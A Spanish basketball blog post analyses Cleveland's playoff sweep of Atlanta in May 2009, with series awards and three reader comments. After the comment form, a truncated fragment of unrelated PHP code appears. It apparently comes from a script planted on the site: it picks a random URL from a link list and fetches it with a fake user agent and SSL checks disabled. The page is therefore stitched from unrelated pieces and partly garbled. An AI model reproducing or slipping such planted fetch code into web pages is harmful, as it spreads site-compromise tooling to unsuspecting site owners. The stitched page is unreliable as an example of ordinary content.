Cavaliers 4 – Hawks 0: Esperando el inicio

12 de May de 2009 por TheDeerHunter

Dos eliminatorias, dos barridas. ¿Han empezado los playoffs para estos Cavs o simplemente es que son demasiado buenos y esta va a ser la tónica general de aquí hasta el título?

El caso es que, quien más y quien menos, podía esperar que esto sucediera. Atlanta definitivamente no ha sido el equipo ideal para parar a Lebron, como tampoco lo fue a la hora de parar a Wade, aunque en su caso lograran llevarse el pírrico gato al agua.

Quizás la imagen que tenemos del Josh Smith asolando a golpe de tapón las penetraciones contrarias nos induce a asociar este equipo con el músculo, la defensa física… ¡Esos highlights que nublan nuestro análisis! La pista tendría que dárnosla la cantidad de votos que recibe para premios de mejor defensor. Olvidémonos de una vez por todas del cliché ese de “el equipo ideal para parar a tal o a cual”. Los Bibby, Williams, Johnson, Horford… no son precisamente unos perros de presa. De las virtudes que tiene Atlanta, la mejor no es precisamente la defensa. Reciben algo más de 95 puntos por partido y ese promedio han mantenido contra los Cavs. No es ese el problema. Es absurdo pretender que este equipo esté mejor preparado para defender a alguien que Cleveland, Boston u Orlando. En cambio, en ataque, son habitualmente un equipo equilibrado, con recursos variados difíciles de marcar. Esa es su principal virtud, el equilibrio entre el ataque y la defensa, entre las distintas posiciones y el banquillo. Pero no ha sido así en esta serie en la que ha habido casi 20 puntos de diferencia entre el ataque y la defensa.

Bajonazo lógico en la producción de Horford y Marvin Williams, desde unos 25 puntos sumados por partido en la regular a los 6 que han logrado en ésta… Sin hablar del resto de categorías. Piezas básicas que mermarían las posibilidades de cualquier equipo. Pero es que, como consecuencia, Bibby y Joe Johnson, sin contar el desgaste acumulado, han estado sobre-defendidos. Otros 35 puntos que se han quedado en 25 esta eliminatoria. Sólo Josh Smith y Flip Murray se han librado de la quema.

Es inevitable que tras el correctivo hayan quedado bastante tocados sobretodo en contraposición con lo que vivieron el año pasado. La sensación de impotencia y de fracaso es gorda.

Sin embargo, convendría no olvidar de dónde viene este equipo y también a dónde va. Contra este Lebron y estos Cavs es muy posible que, aún con sus efectivos a pleno rendimiento, el resultado no hubiera cambiado demasiado pero con todo, han logrado demostrar que son el cuarto mejor equipo del Este y, sin contar a Cleveland, el que más recorrido parece tener en los próximos años. Va a ser interesante comprobar cómo juegan sus cartas.

PREMIOS TJNBA (de la eliminatoria)

MVP: Lebron James ha hecho lo que le ha dado la gana. 33,8 puntos por partido, 8,3 rebotes, 6 asistencias y 2,5 robos. Hasta este momento superando en promedio al mítico Oscar Robertson.

La Sorpresa: Delonte West ha mejorado sus promedios hasta unos interesantes 15 ptos, 4 rebotes, 5 asistencias y 1 robo. No esperábamos que fuera el segunda espada del equipo.

La decepción: Sin tener en cuenta a Horford y Williams por causas justificadas, Mike Bibby ha vuelto a realizar una serie decepcionante para alguien de su categoría. Su anotación ha bajado 5 puntos con respecto a la regular y su ratio de asistencias por pérdida también ha menguado un punto porcentual. Es el segundo año consecutivo que le pasa.

El mayor esfuerzo en vano: Josh Smith ha sido el único pilar donde se podía apoyar ofensivamente el equipo. Sin embargo, 1 tapón por partido, 1 robo en toda la eliminatoria y sólo 5 rebotes dejan un poco en evidencia su a priori extraordinario valor defensivo.

Comenta

3 comentarios a esta entrada

  1. Jabho dice:
    #1

    Bueno, los Hawks venían mermados pero han presentado demasiada poca batalla. No sé, el año pasado estuvieron a punto de eliminar a los Celtics (no tanto pero bueno, jugaron 7 partidos) y la sensación es que con un poco más quien sabe dónde hubieran llegado. Este año la cosa es que han estado muy lejos de realmente competir. La clave de este equipo es Horford (y en menor medida Marvin Williams). Donde llegue Horford marcará el techo del equipo. Joe Johnson aun, pero con Josh yo buscaría un buen traspaso…

    Los Cavs demasiado fácil por ahora. Creo que Boston o Magic defienden mucho mas duro y se lo pondrán más dificil, pero por ahora una apisonadora…. Eso tb nos deja un poco la duda de como reaccionaran ante las dificultades que llegarna seguro

      Citar

  2. Travis dice:
    #2

    Bueno, yo creo que es más mérito de la defensa invisible pero agotadora de los Cavs que demérito de Atlanta… Y yo creo quem a no ser que LeBron se lesione, los Cavs ganarán la NBA este año y probablemente el que viene también. Lo que me jode bastante.

    Si estuviera Garnett hubiéramos visto unas finales de conferencia míticas. Como no, vimos unos cuartos míticos.

      Citar

  3. Txusma dice:
    #3

    Tb estamos viendo unas semifinales de conferencia hiperdisputadas. Directos al septimo partido. Como sufren y luchan estos celtics!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>